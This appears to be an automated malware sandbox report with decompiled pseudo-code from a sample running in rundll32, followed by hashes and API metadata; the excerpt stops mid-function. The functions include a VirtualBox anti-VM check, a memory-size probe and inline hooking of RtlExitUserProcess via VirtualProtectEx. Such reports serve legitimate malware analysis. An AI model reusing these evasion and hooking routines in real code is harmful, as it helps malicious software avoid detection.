                • Instruction Fuzzy Hash: 0531A229317B6481FA219B11A40971563D0F349BE0F19C536EE6D27B98DE3CC6418F80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00000285285C809A748(void* __edi, long long __rax, long long __rbx, long long __rdi, long long __r9, long long _a8, long long _a16, char _a32) {
                				void* _t16;
                				intOrPtr _t24;
                				void* _t25;
                				long long _t42;
                				intOrPtr* _t43;
                				signed long long _t44;
                				intOrPtr* _t52;
                				intOrPtr _t53;
                				void* _t61;
                				char* _t63;
                
                				_t60 = __r9;
                				_t42 = __rax;
                				_a8 = __rbx;
                				_a16 = __rdi;
                				_a32 = __r9;
                				GetModuleHandleA(??);
                				if (__rax == 0) goto 0xc809a811;
                				_a32 = __rax;
                				E00000285285C809B35C(_t25,  &_a32, "RtlExitUserProcess", _t61); // executed
                				if (_t42 == 0) goto 0xc809a811;
                				 *0xc81530ac = 1;
                				if ( *0xc81530ac == 1) goto 0xc809a796;
                				_t52 =  *0xc8153320; // 0x285c6070000
                				if (_t52 == 0) goto 0xc809a7fb;
                				_t24 =  *0xc815332c; // 0xa
                				if (_t24 == 0) goto 0xc809a7cf;
                				_t43 = _t52;
                				if ( *_t43 == 0) goto 0xc809a805;
                				_t44 = _t43 + 0x3c;
                				if (1 - _t24 < 0) goto 0xc809a7c1;
                				if (1 == 0xffffffff) goto 0xc809a7fb;
                				_t63 = _t44 * 0x3c + _t52;
                				_t53 = _a32;
                				 *((long long*)(_t63 + 1)) = _t42;
                				_t16 = E00000285285C809A568(_t44, __rbx, _t63, _t53, _t42, _t60); // executed
                				if (_t16 != 0) goto 0xc809a7fb;
                				 *_t63 = 0;
                				 *0xc81530ac = 0;
                				goto 0xc809a814;
                				 *((char*)(_t44 * 0x3c + _t53)) = 1;
                				goto 0xc809a7d2;
                				return 0xffffffff;
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModulelstrcmp
                • String ID: RtlExitUserProcess$ntdll.dll
                • API String ID: 4066981444-1735925572
                • Opcode ID: 06c4cfafe3bdbe6131d3fb27be968274d94a8257f10f16205c0f732da387a440
                • Instruction ID: 9876ad2014cafd99bcf1f57bf1b0e230bf0646055f6c819770a9238cb1d61a74
                • Opcode Fuzzy Hash: 06c4cfafe3bdbe6131d3fb27be968274d94a8257f10f16205c0f732da387a440
                • Instruction Fuzzy Hash: F821A139317FA085EA55DB19AC5A21566A2EB853A0F15C23BD9B9177E0EE3CC4428F40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00000285285C809D990() {
                				signed int _v24;
                				char _v552;
                				intOrPtr _v568;
                				int _t11;
                				void* _t14;
                				void* _t19;
                				void* _t20;
                				signed long long _t24;
                				void* _t30;
                				void* _t33;
                				signed long long _t34;
                				void* _t35;
                				void* _t37;
                
                				_t24 =  *0xc814c720; // 0xee50a592130
                				_v24 = _t24 ^ _t34;
                				r8d = 0x208;
                				E00000285285C80C8EF0(_t14, 0, _t19, _t20,  &_v552, _t30, _t33, _t35);
                				_v568 = 0x104;
                				_t11 = WNetGetProviderNameW(??, ??, ??); // executed
                				if (_t11 != 0) goto 0xc809da0f;
                				__imp__StrCmpIW();
                				return E00000285285C80C59D0(0 | _t11 == 0x00000000, _v24 ^ _t34, L"VirtualBox Shared Folders", _t37);
                			}

















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: NameProvider
                • String ID: VirtualBox Shared Folders
                • API String ID: 262172401-2247368375
                • Opcode ID: 58885f4abb19d5f845a99889267d7b302267c01fe6a5ffc64e6a71858df7a291
                • Instruction ID: 8d0835ef1b84dc4560a4bce04b3ad10699eff3e81e1eef4f8979d5c0fae06a6e
                • Opcode Fuzzy Hash: 58885f4abb19d5f845a99889267d7b302267c01fe6a5ffc64e6a71858df7a291
                • Instruction Fuzzy Hash: 4401627A326FD082FB60DB24E89939A63A0F7C9755FC09017964E96695EF7CC105CF04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000285285C80DC3C8(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, long long _a8, long long _a16) {
                				void* _t6;
                				void* _t11;
                				intOrPtr _t13;
                				intOrPtr _t16;
                				void* _t27;
                				void* _t33;
                				void* _t36;
                
                				_t33 = __rdx;
                				_t31 = __rcx;
                				_t29 = __rbx;
                				_t27 = __rax;
                				_a8 = __rbx;
                				_a16 = __rsi;
                				GetLastError();
                				_t13 =  *0xc814c964; // 0xffffffff
                				if (_t13 == 0xffffffff) goto 0xc80dc3f9;
                				_t6 = E00000285285C80DC9F4(_t13, _t13 - 0xffffffff, __rax, __rbx, __rcx);
                				if (__rax != 0) goto 0xc80dc43a;
                				E00000285285C80D7C38(_t6, _t31, _t33); // executed
                				_t36 = _t27;
                				if (_t27 != 0) goto 0xc80dc419;
                				E00000285285C80DA780(_t27, _t31);
                				goto 0xc80dc43f;
                				_t16 =  *0xc814c964; // 0xffffffff
                				if (E00000285285C80DCA4C(_t16, _t27, _t27, _t29, _t31, _t27, __rsi) == 0) goto 0xc80dc412;
                				E00000285285C80DC0A0(_t36, _t27);
                				_t11 = E00000285285C80DA780(_t27, _t36);
                				if (_t36 != 0) goto 0xc80dc449;
                				SetLastError(??);
                				goto 0xc80dc454;
                				SetLastError(??);
                				return _t11;
                			}











                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: bfdaeda6932f48ca5ff48361fe3939014b449c0591b6a111b209979d48e3d4ba
                • Instruction ID: fe18876808ab6b36e7342467e35a6d7f6efe734a088d1d57f138645156de99f0
                • Opcode Fuzzy Hash: bfdaeda6932f48ca5ff48361fe3939014b449c0591b6a111b209979d48e3d4ba
                • Instruction Fuzzy Hash: 1411A12D303FB082FA18A7A5A51D3382191DF88BD0F45C52B990A777C6DE3CC8468B00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00000285285C809F9F0() {
                				signed int _v24;
                				intOrPtr _v28;
                				void* _v80;
                				intOrPtr _v88;
                				void* _t20;
                				signed long long _t23;
                				signed long long _t24;
                				void* _t29;
                				signed long long _t30;
                				void* _t31;
                				signed long long _t32;
                
                				_t32 = _t30;
                				_t23 =  *0xc814c720; // 0xee50a592130
                				_t24 = _t23 ^ _t30;
                				_v24 = _t24;
                				 *(_t32 - 0x54) = _t24;
                				 *(_t32 - 0x4c) = _t24;
                				 *(_t32 - 0x44) = _t24;
                				 *(_t32 - 0x3c) = _t24;
                				 *(_t32 - 0x34) = _t24;
                				 *(_t32 - 0x2c) = _t24;
                				 *(_t32 - 0x24) = _t24;
                				_v28 = 0;
                				_v88 = 0x40;
                				GlobalMemoryStatusEx(??); // executed
                				return E00000285285C80C59D0(_t20, _v24 ^ _t30, _t29, _t31);
                			}















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID: @
                • API String ID: 1890195054-2766056989
                • Opcode ID: 2ecb87edcf64bce3e4ea576f9fe6ad7bb7e3c930542fbaf679872767e05fdeb0
                • Instruction ID: 252403a2e067f0b032c139ca4521955a8e5328c6b96b82c6ffb02601958f9aa4
                • Opcode Fuzzy Hash: 2ecb87edcf64bce3e4ea576f9fe6ad7bb7e3c930542fbaf679872767e05fdeb0
                • Instruction Fuzzy Hash: 4FF0F43A72AF5089EB90CF22E81934D33E5F38C790F92813AD69D82700EF3985218F04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 29%
                			E00000285285C809A568(signed int __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed int __r9, long long _a8, char _a24, intOrPtr _a25, char _a28, signed int _a32) {
                				long long _v40;
                				void* __rsi;
                				void* __rbp;
                				signed char _t56;
                				int _t61;
                				void* _t65;
                				void* _t66;
                				void* _t73;
                				void* _t75;
                				void* _t78;
                				void* _t81;
                				signed char _t88;
                				signed long long _t92;
                				long long _t94;
                				void* _t97;
                				signed long long _t107;
                				intOrPtr* _t108;
                				signed long long _t109;
                				intOrPtr* _t111;
                				void* _t117;
                				long long _t118;
                				void* _t119;
                				long long _t120;
                				char* _t126;
                				intOrPtr* _t128;
                
                				_a8 = __rbx;
                				_a32 = __r9;
                				_a24 = __r8;
                				r9d = r9d | 0xffffffff;
                				r10d = 0;
                				_t75 =  *0xc815332c - r10d; // 0xa
                				_t118 = __rdx;
                				_t97 = __rcx;
                				if (_t75 <= 0) goto 0xc809a5f2;
                				_t107 = __rax * 0x3c;
                				_t92 =  *0xc8153320; // 0x285c6070000
                				if ( *((char*)(_t107 + _t92)) == 0) goto 0xc809a5df;
                				if ( *((intOrPtr*)(_t107 + _t92 + 0x28)) != __rdx) goto 0xc809a5df;
                				_t108 =  *((intOrPtr*)(_t107 + _t92 + 0x30));
                				r8d = 0;
                				_t78 =  *_t108 - r8d;
                				if (_t78 <= 0) goto 0xc809a5d9;
                				asm("lock bts dword [ecx+edx+0x4], 0x0");
                				if (_t78 >= 0) goto 0xc809a5d6;
                				r8d = r8d + 1;
                				if (r8d -  *_t108 < 0) goto 0xc809a5bc;
                				goto 0xc809a5d9;
                				r9d = r8d;
                				if (r9d != 0xffffffff) goto 0xc809a5ed;
                				r10d = r10d + 1;
                				_t81 = r10d -  *0xc815332c; // 0xa
                				if (_t81 < 0) goto 0xc809a594;
                				if (_t108 != 0) goto 0xc809a612;
                				E00000285285C809A884(_t66, _t92, __rcx, __rdx, __rdx, _t119); // executed
                				_t109 = _t92;
                				if (_t92 == 0) goto 0xc809a616;
                				 *_t92 = 0x42;
                				r9d = 0;
                				 *((intOrPtr*)(_t92 + 4)) = 1;
                				 *(_t97 + 0x38) = r9d;
                				 *(_t97 + 0x30) = _t109;
                				if (_t109 != 0) goto 0xc809a626;
                				goto 0xc809a73a;
                				r8d = 0x2c;
                				_t117 = _t92 * 0x3e + _t109;
                				_t13 = _t117 + 0x16; // 0x16
                				_t120 = _t13;
                				E00000285285C809A828(0x90, _t120);
                				_t56 = E00000285285C809B0D8(_t65, 0x90, _t73, _t97,  *((intOrPtr*)(_t97 + 1)), _t120);
                				 *(_t97 + 9) = _t56 & 0x000000ff;
                				if (_t56 != 0) goto 0xc809a660;
                				 *(_t117 + 4) =  *(_t117 + 4) & 0x00000000;
                				goto 0xc809a61f;
                				_t111 =  *((intOrPtr*)(_t97 + 1));
                				_t126 = _t97 + 0xa;
                				if (_t126 == 0) goto 0xc809a686;
                				if (_t111 == 0) goto 0xc809a686;
                				_t88 = _t56;
                				if (_t88 == 0) goto 0xc809a686;
                				 *_t126 =  *_t111;
                				if (_t88 != 0) goto 0xc809a676;
                				 *((long long*)(_t97 + 0x28)) = _t118;
                				_t21 = _t117 + 4; // 0x4
                				 *0xc81530a0 = _t120;
                				 *(_t117 + 0xa) =  *(_t117 + 0xa) & 0x00000000;
                				_a25 = _t21 -  *((intOrPtr*)(_t97 + 1)) - 1;
                				r9d = 0x40;
                				 *((short*)(_t117 + 8)) = 0x25ff;
                				 *((long long*)(_t117 + 0xe)) = 0x285c8057db0;
                				r8d =  *(_t97 + 9) & 0x000000ff;
                				_t94 =  &_a32;
                				_v40 = _t94;
                				_a24 = 0xe9;
                				_t61 = VirtualProtectEx(??, ??, ??, ??, ??); // executed
                				if (_t61 == 0) goto 0xc809a65a;
                				 *(_t117 + 0x36) =  *(_t117 + 0x36) & 0x00000000;
                				 *((short*)(_t117 + 0x34)) = 0x25ff;
                				 *((long long*)(_t117 + 0x3a)) = _t94 +  *((intOrPtr*)(_t97 + 1));
                				_t128 =  *((intOrPtr*)(_t97 + 1));
                				if (_t128 == 0) goto 0xc809a714;
                				 *_t128 = _a24;
                				 *((char*)(_t128 + 4)) = _a28;
                				r8d =  *(_t97 + 9) & 0x000000ff;
                				r9d = _a32;
                				_v40 =  &_a32;
                				VirtualProtectEx(??, ??, ??, ??, ??); // executed
                				return 1;
                			}





























                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 4bf50c46bb647c84ff8375c8539a0b715aed05018f51fe42ab3b111d6a1aa26d
                • Instruction ID: 9b6b5ccd186a25ce60f2b9866e12c927f93b54202a973a93db5ecb0f9d60585b
                • Opcode Fuzzy Hash: 4bf50c46bb647c84ff8375c8539a0b715aed05018f51fe42ab3b111d6a1aa26d
                • Instruction Fuzzy Hash: DD51F67A306FA08AEB509F24E509359BBA1F745B98F08C226DB6517BD4DF3CC451CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000285285C80A09D0(long long __rax, long long __rbx, signed long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                				long long _v32;
                				signed int _v40;
                				void* __rdi;
                				void* _t13;
                				void* _t15;
                				long long _t20;
                				long long _t23;
                				signed long long* _t31;
                				void* _t33;
                				void* _t35;
                				void* _t42;
                
                				_t20 = __rax;
                				_v32 = 0xfffffffe;
                				_a8 = __rbx;
                				_a32 = __rsi;
                				_t33 = __r9;
                				_t42 = __rdx;
                				_t31 = __rcx;
                				_v40 = _v40 & 0x00000000;
                				E00000285285C80A15B8(_t13, __rcx, __r8);
                				_t23 = _t20;
                				_a16 = _t20;
                				_a24 = _t20;
                				if (_t20 == 0) goto 0xc80a0a2c;
                				_t15 = E00000285285C80A0950(_t23, _t20, _t42, __r8, _t33); // executed
                				 *_t31 =  *_t31 & 0x00000000;
                				_t31[1] = _t31[1] & 0x00000000;
                				_t10 = _t23 + 0x10; // 0x10
                				return E00000285285C80A135C(_t15, _t23, _t31, _t10, _t31, _t33, _t35, _t23);
                			}

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$AllocPtr::__Ptr_baseStatic
                • String ID:
                • API String ID: 2446911711-0
                • Opcode ID: 3ee81a84e783e839f3571ab78e40daf51b1fb701907726a107132894d7ed6ea7
                • Instruction ID: d1de616a2d23677844537d501ba28437bdfbdcd7b6237060e29164444bc647e3
                • Opcode Fuzzy Hash: 3ee81a84e783e839f3571ab78e40daf51b1fb701907726a107132894d7ed6ea7
                • Instruction Fuzzy Hash: 9801D636216F9082E7008B52B84439AB390F788FF4F148725AEAC17BDADF7CC0528B00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 19%
                			E00000285285C80DB70C(signed int __esi, long long __rbx, void* __rdx, long long __rsi, signed long long*** __r8, long long __r9, long long _a8, long long _a16, long long _a32) {
                				signed long long _v48;
                				signed long long _v56;
                				signed long long _v64;
                				signed long long _v72;
                				signed long long _t50;
                				intOrPtr* _t54;
                				signed long long _t57;
                				signed long long _t61;
                				signed long long _t62;
                				signed long long _t63;
                				signed long long _t72;
                				signed long long _t73;
                				signed int* _t74;
                				signed long long _t77;
                				signed long long _t81;
                				signed long long _t82;
                				signed long long _t84;
                				signed long long _t92;
                				signed long long*** _t97;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_a32 = __r9;
                				_t97 = __r8;
                				E00000285285C80D3CEC();
                				_t72 =  *((intOrPtr*)( *((intOrPtr*)(__r8))));
                				if (_t72 != 0) goto 0xc80db74a;
                				goto 0xc80db88a;
                				_t81 =  *0xc814c720; // 0xee50a592130
                				r8d = __esi;
                				r8d = r8d & 0x0000003f;
                				_t77 = _t81 ^  *_t72;
                				asm("dec eax");
                				_v56 = _t77;
                				_t61 = _t81 ^  *(_t72 + 8);
                				asm("dec eax");
                				_v72 = _t61;
                				_t7 = _t77 - 1; // 0xee50a59212f
                				_t50 = _t7;
                				if (_t50 - 0xfffffffd > 0) goto 0xc80db880;
                				_v64 = _t77;
                				_v48 = _t61;
                				r13d = 0x40;
                				asm("dec eax");
                				_t62 = _t61 - 8;
                				_v72 = _t62;
                				if (_t62 - _t77 < 0) goto 0xc80db7c4;
                				if ( *_t62 != (_t50 ^ _t81)) goto 0xc80db7bf;
                				goto 0xc80db7aa;
                				if (_t62 - _t77 >= 0) goto 0xc80db80e;
                				_t63 = _t62 | 0xffffffff;
                				if (_t77 == _t63) goto 0xc80db7dc;
                				E00000285285C80DA780(_t50 ^ _t81, _t77);
                				_t82 =  *0xc814c720; // 0xee50a592130
                				r13d = r13d - (__esi & 0x0000003f);
                				asm("dec eax");
                				_t73 = _t72 ^ _t82;
                				 *( *( *_t97)) = _t73;
                				( *( *_t97))[1] = _t73;
                				_t54 =  *_t97;
                				 *( *_t54 + 0x10) = _t73;
                				goto 0xc80db880;
                				asm("dec eax");
                				 *_t63 = _t54;
                				 *0xc80f7698(); // executed
                				TlsFree(??); // executed
                				_t74 =  *( *_t97);
                				_t84 =  *0xc814c720; // 0xee50a592130
                				r8d = __esi;
                				r8d = r8d & 0x0000003f;
                				_t92 = _t84 ^  *_t74;
                				asm("dec ecx");
                				_t57 = _t74[2] ^ _t84;
                				asm("dec eax");
                				if (_t92 != _t77) goto 0xc80db85b;
                				if (_t57 == _t61) goto 0xc80db87b;
                				_v64 = _t92;
                				_v56 = _t92;
                				_v48 = _t57;
                				_v72 = _t57;
                				goto 0xc80db79c;
                				E00000285285C80D3D40();
                				return 0;
                			}

                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 69ab4f87d4ed671cd3057637d2d326f493590c95839ed9e94bbdcf417b247d1c
                • Instruction ID: 91305c836472c76bbe3cb21a56ccd3d76909105e41a83a50ed9a42f927f17206
                • Opcode Fuzzy Hash: 69ab4f87d4ed671cd3057637d2d326f493590c95839ed9e94bbdcf417b247d1c
                • Instruction Fuzzy Hash: B5418D3A312F6482EA14CB15E854259B3A5F798FE4F14D217EEA917BE8DF3CC4528B40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00000285285C80DADA0(void* __ecx, void* __edx, void* __edi, long long __rbx, long long __rdi, long long __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
                				void* _t28;
                				void* _t46;
                				signed long long _t61;
                				long long _t63;
                				intOrPtr* _t66;
                				signed long long _t67;
                				signed long long _t76;
                				signed long long _t81;
                				void* _t84;
                				void* _t85;
                				WCHAR* _t88;
                
                				_t79 = __rsi;
                				_t63 = __rbx;
                				_t61 = _t81;
                				 *((long long*)(_t61 + 8)) = __rbx;
                				 *((long long*)(_t61 + 0x10)) = __rsi;
                				 *((long long*)(_t61 + 0x18)) = __rdi;
                				 *((long long*)(_t61 + 0x20)) = __r14;
                				_t46 = r8d;
                				r14d = __ecx;
                				if (r8d != 0) goto 0xc80dae10;
                				GetModuleHandleW(_t88);
                				if (_t61 == 0) goto 0xc80dae10;
                				if ( *_t61 != 0x5a4d) goto 0xc80dae10;
                				_t66 =  *((intOrPtr*)(_t61 + 0x3c)) + _t61;
                				if ( *_t66 != 0x4550) goto 0xc80dae10;
                				if ( *((intOrPtr*)(_t66 + 0x18)) != 0x20b) goto 0xc80dae10;
                				if ( *((intOrPtr*)(_t66 + 0x84)) - 0xe <= 0) goto 0xc80dae10;
                				if ( *((intOrPtr*)(_t66 + 0xf8)) == _t46) goto 0xc80dae10;
                				E00000285285C80DAF58(0x20b, r14d, _t61, __rbx);
                				E00000285285C80D3CEC();
                				if ( *0xc8152800 != 0) goto 0xc80daeda;
                				r15d = 1;
                				 *0xc81527f0 = r15d;
                				if (__edx != 0) goto 0xc80dae83;
                				_t76 =  *0xc814c720; // 0xee50a592130
                				asm("dec eax");
                				_t62 = _t61 ^ _t76;
                				_t67 =  *0xc81527f8; // 0xee50a592130
                				if (_t67 == (_t61 ^ _t76)) goto 0xc80dae7a;
                				asm("dec eax");
                				 *0xc80f7698();
                				r8d = 0;
                				 *(_t76 ^ _t67)();
                				goto 0xc80dae8f;
                				if (__edx != r15d) goto 0xc80dae95;
                				E00000285285C80DBA98(0xc8152950); // executed
                				if (__edx != 0) goto 0xc80daeac;
                				E00000285285C80DBCEC(_t63, 0xc80f7880, 0xc80f78a0, _t76 ^ _t67, __rsi);
                				E00000285285C80DBCEC(_t63, 0xc80f78a8, 0xc80f78b0, _t76 ^ _t67, _t79);
                				_t27 =  ==  ? r15d :  *0xc8152800 & 0x000000ff;
                				 *0xc8152800 =  ==  ? r15d :  *0xc8152800 & 0x000000ff;
                				_t28 = E00000285285C80CB034(_t62, _t63, 0xc80f78b0, _t84, _t85);
                				E00000285285C80D3D40();
                				if (_t46 != 0) goto 0xc80daef1;
                				E00000285285C80DAF0C();
                				asm("int3");
                				return _t28;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModule$AddressFreeLibraryProc
                • String ID:
                • API String ID: 3947729631-0
                • Opcode ID: 849623d9c797c720e54815ebb49edc999433eb98e2be7115e3a12f13f8e5b1a2
                • Instruction ID: 56f4801cc2f965b3f906d32251e0aee5779caac3b70f6fad26813bf8ac801a09
                • Opcode Fuzzy Hash: 849623d9c797c720e54815ebb49edc999433eb98e2be7115e3a12f13f8e5b1a2
                • Instruction Fuzzy Hash: 4B419E2E613F7082FB249B65D45A36922A2FB96F80F44D42BDA09676D1DF3DC846CF40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000285285C80A0950(long long __rbx, long long __rcx, long long __rdx, intOrPtr* __r8, intOrPtr* __r9, long long _a16, void* _a24) {
                				long long _v32;
                				void* __rdi;
                				void* __rsi;
                				void* _t13;
                				void* _t14;
                				void* _t16;
                				void* _t17;
                				void* _t19;
                				long long _t23;
                				long long _t25;
                				long long _t31;
                				intOrPtr* _t34;
                				void* _t36;
                
                				_t25 = __rcx;
                				_t19 = _t36;
                				 *((long long*)(_t19 + 0x10)) = __rdx;
                				 *((long long*)(_t19 + 8)) = __rcx;
                				 *((long long*)(_t19 - 0x28)) = 0xfffffffe;
                				 *((long long*)(_t19 + 0x18)) = __rbx;
                				_t34 = __r9;
                				_t23 = __rcx;
                				 *((intOrPtr*)(__rcx + 8)) = 1;
                				 *((intOrPtr*)(__rcx + 0xc)) = 1;
                				 *((long long*)(__rcx)) = 0xc80f7b48;
                				_t7 = _t25 + 0x10; // 0x10
                				_t31 = _t7;
                				r8d = 0xa0;
                				E00000285285C80C8EF0(_t14, 0, _t16, _t17, _t31, __rdx, _t31, __r8);
                				_a16 = _t31;
                				_v32 = _t31;
                				if (_t31 == 0) goto 0xc80a09bf;
                				r8b =  *_t34;
                				_t13 = E00000285285C80A0AF8(_t23, _t31,  *__r8, _t31, _t34, __r8); // executed
                				return _t13;
                			}

                APIs
                • __ExceptionPtr::__ExceptionPtr.LIBCPMT ref: 00000285C80A09B9
                  • Part of subcall function 00000285C80A0AF8: EncodePointer.KERNEL32 ref: 00000285C80A0BE7
                  • Part of subcall function 00000285C80A0AF8: __ExceptionPtr::_CallCopyCtor.LIBCPMT ref: 00000285C80A0C31
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$CallCopyCtorEncodePointerPtr::_Ptr::__
                • String ID:
                • API String ID: 1376364169-0
                • Opcode ID: 46d2c3a1ecbbe3245fce4663c78dad321fa76ba8b756435cf62105fadf4d1971
                • Instruction ID: 7f68d612180c0e835e51e96502b36f7dadf49de5064c8335f2ade011b978813b
                • Opcode Fuzzy Hash: 46d2c3a1ecbbe3245fce4663c78dad321fa76ba8b756435cf62105fadf4d1971
                • Instruction Fuzzy Hash: F201A236302B9481E711CF1AE544299BBA1E789FF0F29C2259EA8577A1DE39C453CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 16%
                			E00000285285C8055910(void* __rax) {
                				void* _v424;
                				void* _t9;
                
                				E00000285285C80C51CC(_t9, __rax);
                				asm("lock xadd [0xfdbb0], eax");
                				if (1 != 1) goto 0xc805594b;
                				__imp__#115(); // executed
                				 *0xc81534e4 = 2;
                				return  *0xc81534e4;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Startup_onexit
                • String ID:
                • API String ID: 3012808385-0
                • Opcode ID: 02b5b6bada1194484d64ed02d6068ab445445d8aea1f25d6f1ba0bb3032c4826
                • Instruction ID: 858f46cabea8c3651f734c532916baa287b9c71054b8c5e589495af0f6f86553
                • Opcode Fuzzy Hash: 02b5b6bada1194484d64ed02d6068ab445445d8aea1f25d6f1ba0bb3032c4826
                • Instruction Fuzzy Hash: 45E0B639956AA58AEB61EB14E8483A823A5F755359F8084238115921A5DE2ECA0A8F41
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: lstrcmp
                • String ID:
                • API String ID: 1534048567-0
                • Opcode ID: 4f7be571659891ed88d014e727661c5c47c76810975cf07defc41387156c96f6
                • Instruction ID: 014e55cf075dd18d90213401c6534c69651a23681325d75d0f3216939fec4a71
                • Opcode Fuzzy Hash: 4f7be571659891ed88d014e727661c5c47c76810975cf07defc41387156c96f6
                • Instruction Fuzzy Hash: 4141B127212A74A7EA24CF05E82872D73A1F744B58F44C5329B5A63B84EF7CD8919F80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00000285285C80D7C38(void* __eax, signed int __rcx, signed int __rdx) {
                				void* __rbx;
                				intOrPtr* _t22;
                				signed int _t29;
                
                				_t29 = __rdx;
                				if (__rcx == 0) goto 0xc80d7c57;
                				_t1 = _t29 - 0x20; // -32
                				_t22 = _t1;
                				if (_t22 - __rdx < 0) goto 0xc80d7c9a;
                				_t25 =  ==  ? _t22 : __rcx * __rdx;
                				goto 0xc80d7c7e;
                				if (E00000285285C80E2620() == 0) goto 0xc80d7c9a;
                				if (E00000285285C80DAB7C(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xc80d7c9a;
                				HeapAlloc(??, ??, ??); // executed
                				if (_t22 == 0) goto 0xc80d7c69;
                				goto 0xc80d7ca7;
                				E00000285285C80D3944(_t22);
                				 *_t22 = 0xc;
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AllocHeap
                • String ID:
                • API String ID: 4292702814-0
                • Opcode ID: cc00c99792c01c48a74819868d5af1b3ab31548aa1daff8c19e093dd554bb964
                • Instruction ID: bc853860e27782411f54de3c5d0d2ce7e39c6e0a5e58f3b157fb6a40cf9e243b
                • Opcode Fuzzy Hash: cc00c99792c01c48a74819868d5af1b3ab31548aa1daff8c19e093dd554bb964
                • Instruction Fuzzy Hash: C1F0B45D303F2585FE945BA2545D3A95280DB8AB82F1CE43F8D0AA63D2EE2CC4838F10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 26%
                			E00000285285C8057ED0(signed char __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, signed long long __r9, signed int __r12) {
                				void* __rbp;
                				void* __r14;
